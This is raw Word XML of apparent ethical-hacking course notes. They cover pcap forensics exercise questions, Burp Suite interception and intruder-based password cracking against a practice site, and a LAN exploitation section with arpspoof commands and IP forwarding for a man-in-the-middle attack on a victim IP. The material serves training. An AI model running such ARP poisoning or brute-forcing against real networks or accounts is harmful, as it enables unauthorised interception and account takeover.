    <w:p w14:paraId="0000035C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000035D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000035E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000035F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000360" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000361" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>27-09-2021, MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000362" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000363" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Find the below details from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000364" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Attacker’s computer IP (192.168.1.158)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000365" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000366" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000367" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Evidence 001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000368" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. What is the name of Attacker’s IM buddy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000369" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. What was the first comment in the captured IM conversation?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000036A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. What is the name of the file Attacker transferred?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000036B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. What is the secret recipe?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000036C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000036D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Evidence 002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000036E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. What is Attacker’s email address?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000036F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. What is Attacker’s email password?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000370" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. What is Attacker’s secret lover’s email address?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000371" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. What two items did Attacker tell her secret lover to bring?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000372" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. What is the NAME of the attachment Attacker sent to her secret lover?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000373" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000374" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000375" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000376" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>28-09-2021, TUESDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000377" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>BURPSUITE, WPSCAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000378" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000379" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>BURPSUITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000037A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Web Application proxy interceptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000037B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Best tool for web application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000037C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Other</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> alternate tool - fiddler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000037D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000037E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000037F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- We can intercept traffic which goes out of a browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000380" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- We can analyse the contents of the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000381" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- We can tamper (edit), modify or remove any content of the packet and u can forward packet to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000382" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- We can also intercept the packet or response which we got from server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000383" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- To analyse request and response from the server, to tamper data, to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> usernames and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000384" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000385" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000386" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Install burp (community edition 1.7.36) in windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000387" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> proxy setting to burp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000388" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>127.0.0.1 &amp; 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000389" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Download CA certificate of burp and install in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000038A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Verify If google.com packet gets intercepted in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000038B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Login to testphp.vulnerb.com give wrong username and password - use burp to send that to intruder and perform password cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000038C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000038D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000038E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SPIDERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000038F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ABC.COM./home.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000390" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>abc.com/contactus.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000391" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>abc.com/home.html/?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000392" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000393" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We will choose </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with input parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000394" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://testphp.vulnweb.com/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000395" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://testphp.vulnweb.com/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000396" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000397" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000398" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>there will be a user input parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000399" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>cat=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000039A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>name=value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000039B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>input parameter name - cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000039C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>input parameter value - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000039D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000039E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000039F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003A0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003A1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003A2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003A3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003A4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>30-09-2021, THURSDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003A5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003A6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003A7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003A8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. LAN EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003A9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Attacks which happen inside LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003AA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003AB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>NETWORK SNIFFING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003AC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Sniffing is to grab other user traffic or computer traffic which is present inside the LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003AD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003AE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Wireshark can sniff traffic of devices which is connected to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000003AF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">and for devices which are connected through wired connection, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>goign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to sniff the traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003B0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003B1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>For those devices which are connected through wired - we have to do network sniffing to get those packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003B2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003B3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TOOLS - ARPSPOOF, ETTERCAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003B4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003B5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ARPSPOOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003B6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Command Line based tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003B7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ARP - Address Resolution Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003B8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Converts IP to MAC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003B9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003BA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>converts network address to physical address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003BB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003BC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">C:/&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003BD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003BE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">ATTACK NAME - MITM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003BF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Man In </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Middle Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003C0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Poisioning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000003C1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003C2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Mandatory device - we need modem and not personal hotspot of mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003C3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003C4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Manual Process of ARP spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003C5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Router IP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003C6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VIctim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003C7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Attacker IP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>192.168.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003C8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003C9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We need to configure your computer not to drop packets which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>doesnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> belong to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003CA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003CB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>In kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003CC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#echo '1' &gt; /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000003CD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1 means ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003CE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>0 means OFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003CF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003D0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Terminal 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003D1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wlan0 -t &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>victimip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>routerip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003D2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wlan0 -t 192.168.1.5 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003D3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003D4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003D5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Terminal 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003D6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wlan0 -t &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>routerip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>victimip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003D7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wlan0 -t 192.168.1.1 192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003D8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000003D9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003DA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Turn on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and check if you get the traffic of 192.168.1.5 (victim IP)</w:t>
      </w:r>
